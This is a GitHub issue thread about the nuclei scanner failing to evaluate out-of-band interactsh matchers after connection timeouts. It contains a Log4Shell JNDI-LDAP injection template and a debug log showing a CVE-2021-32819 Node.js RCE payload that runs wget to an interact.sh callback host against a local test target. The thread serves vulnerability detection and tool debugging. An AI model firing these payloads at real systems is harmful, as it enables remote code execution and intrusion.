Matchers (ie: OOB) could still run for connection timeout

[fopinappb]

Nuclei version:

[INF] Current Version: 2.5.4

Current Behavior:

Ran a test that triggers a connection timeout. The defined matcher is for interactsh dns and the request is received (shown with -debug) but nuclei does not run the matchers because the connection timed out.

Expected Behavior:

Given the OOB matching, I'd expect to be able for matchers to be evaluated even on connection timeout, even if it's a flag in the template.

Steps To Reproduce:

1. run nuclei -u http://target -t custom/log4j.yml -debug -retries 1

Anything else:

log4j:

id: CVE-99999-99999

info:
  name: .
  author: .
  description: .
  tags: cve

requests:
  - method: GET
    path:
      - '{{BaseURL}}/${jndi:ldap://{{interactsh-url}}:443/a}'

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

(related to the new log4j PoC - https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html)

With -debug I can see

[c6x] Received DNS interaction (A) from 1.2.3.4 at 2021-12-10 15:51:43

but no match

[ehsandeep]

@fopinappb this specific case was fixed as part of #969, but not sure if its a regression, we will investigate this further.

[fopinappb]

let me know if I can help with anything 🙇

[Phoenix1112]

@ehsandeep same template and not found any vulnerability

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.5.4

                projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.5.4 (latest)
[INF] Using Nuclei Templates 8.7.0 (latest)
[INF] Using Interactsh Server https://interactsh.com
[INF] Templates added in last update: 2681
[INF] Templates loaded for scan: 1
[ERR] Could not initialize interactsh client: could not create client: could not make register request: POST https://interactsh.com/register giving up after 6 attempts: Post "https://interactsh.com/register": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[INF] No results found. Better luck next time!

[fopinappb]

as a note for anyone that ends up trying to use the template: use an invalid port (such as 99999) which still triggers DNS resolution but instantly fails to connect, avoiding nuclei timeout and evaluating matchers :)

[arthur4ires]

I would like to point out that I am experiencing the same problem and that the nuclei, even though interactsh with -debug enabled, returns the DNS response, it does not display the DNS response.

[Phoenix1112]

hello, I found that it worked when I tried this issue on another server. I'm trying to figure out why it doesn't work with the same version nuclei on my own computer. I am using windows operating system but I have an ubuntu machine with wsl. I ran nuclei in ubuntu and started seeing interact server related error and nuclei found nothing.

[ERR] Could not initialize interactsh client: could not create client: could not make register request: POST https://interactsh.com/register giving up after 6 attempts: Post "https://interactsh.com/register": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[INF] No results found. Better luck next time!

but when I ran the same processes with the same version nuclei on my ubuntu vps server it worked successfully. I think this is blocked by windows firewall and antivirus programs. already earlier the antivirus program identified several of the nuclei templates as infected and deleted them.

[fopinappb]

@Phoenix1112 that seems to be different than what's discussed in this issue. You're failing to register in interactsh so it won't work (either due to massive use of the server these days or restrictions on your vps).
This issue is about successfully registering, nuclei seeing there is indeed a query but failing to log success as the main connection timed out.

[Mzack9999]

@Phoenix1112 The issue that you are describing is probably due to projectdiscovery/interactsh#127, anyway, now it should be working as it's using interact.sh, if you are still facing the issue, please try over http (http://interact.sh)

@fopinappb I cannot reproduce the issue with the latest and dev version of nuclei. In all the cases of successful OOB (printed via debug), even after a few seconds after the http request timeout, the target is matched. The only case when this might be missed is when the polling interval seconds >= number of retries * timeout or when the interaction generally happens out of the elaboration time window. Are you still able to reproduce this with the dev version of nuclei?

[ehsandeep]

I can confirm, the interaction works even the HTTP request gets timed out.

GET /?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c79atg9dp8btshqumjngc8jk73edqedsk.interact.sh%27);// HTTP/1.1
Host: 127.0.0.1:9999
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[c79atg9dp8btshqumjngc8jk73edqedsk] Received DNS interaction (A) from 165.227.94.23 at 2022-01-03 08:08:06
-----------
DNS Request
-----------

;; opcode: QUERY, status: NOERROR, id: 3779
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; QUESTION SECTION:
;c79atg9dp8btshqumjngc8jk73edqedsk.interact.sh.	IN	 A

;; ADDITIONAL SECTION:

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1232


------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 3779
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;c79atg9dp8btshqumjngc8jk73edqedsk.interact.sh.	IN	 A

;; ANSWER SECTION:
c79atg9dp8btshqumjngc8jk73edqedsk.interact.sh.	3600	IN	A	46.101.25.250

;; AUTHORITY SECTION:
c79atg9dp8btshqumjngc8jk73edqedsk.interact.sh.	3600	IN	NS	ns1.interact.sh.
c79atg9dp8btshqumjngc8jk73edqedsk.interact.sh.	3600	IN	NS	ns2.interact.sh.

;; ADDITIONAL SECTION:
ns1.interact.sh.	3600	IN	A	46.101.25.250
ns2.interact.sh.	3600	IN	A	46.101.25.250


[c79atg9dp8btshqumjngc8jk73edqedsk] Received DNS interaction (AAAA) from 165.227.94.23 at 2022-01-03 08:08:06
-----------
DNS Request
-----------

;; opcode: QUERY, status: NOERROR, id: 41163
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; QUESTION SECTION:
;c79atg9dp8btshqumjngc8jk73edqedsk.interact.sh.	IN	 AAAA

;; ADDITIONAL SECTION:

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1232


------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 41163
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;c79atg9dp8btshqumjngc8jk73edqedsk.interact.sh.	IN	 AAAA


[c79atg9dp8btshqumjngc8jk73edqedsk] Received HTTP interaction from XX.XX.XX.XX at 2022-01-03 08:08:08
------------
HTTP Request
------------

GET / HTTP/1.1
Host: c79atg9dp8btshqumjngc8jk73edqedsk.interact.sh
Accept: */*
Accept-Encoding: identity
Connection: Keep-Alive
User-Agent: Wget/1.18 (linux-gnu)



-------------
HTTP Response
-------------

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Server: interact.sh

<html><head></head><body>ksdeqde37kj8cgnjmuqhstb8pd9gta97c</body></html>

[c79atg9dp8btshqumjngc8jk73edqedsk] Received HTTP interaction from XX.XX.XX.XX at 2022-01-03 08:08:12
------------
HTTP Request
------------

GET / HTTP/1.1
Host: c79atg9dp8btshqumjngc8jk73edqedsk.interact.sh
Accept: */*
Accept-Encoding: identity
Connection: Keep-Alive
User-Agent: Wget/1.18 (linux-gnu)



-------------
HTTP Response
-------------

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Server: interact.sh

<html><head></head><body>ksdeqde37kj8cgnjmuqhstb8pd9gta97c</body></html>

[2022-01-03 08:08:16] [CVE-2021-32819] [http] [critical] http://127.0.0.1:9999/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c79atg9dp8btshqumjngc8jk73edqedsk.interact.sh%27);//
[WRN] [CVE-2021-32819] Could not execute request for http://127.0.0.1:9999: GET http://127.0.0.1:9999/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c79atg9dp8btshqumjngc8jk73edqedsk.interact.sh%27);// giving up after 2 attempts: Get "http://127.0.0.1:9999/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c79atg9dp8btshqumjngc8jk73edqedsk.interact.sh%27);//": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

[fopinappb]

I started using -interactions-cooldown-period 30 little after opening this and I can confirm it does work.
I had missed that the default cooldown was 5 seconds.
Thank you for all the replies!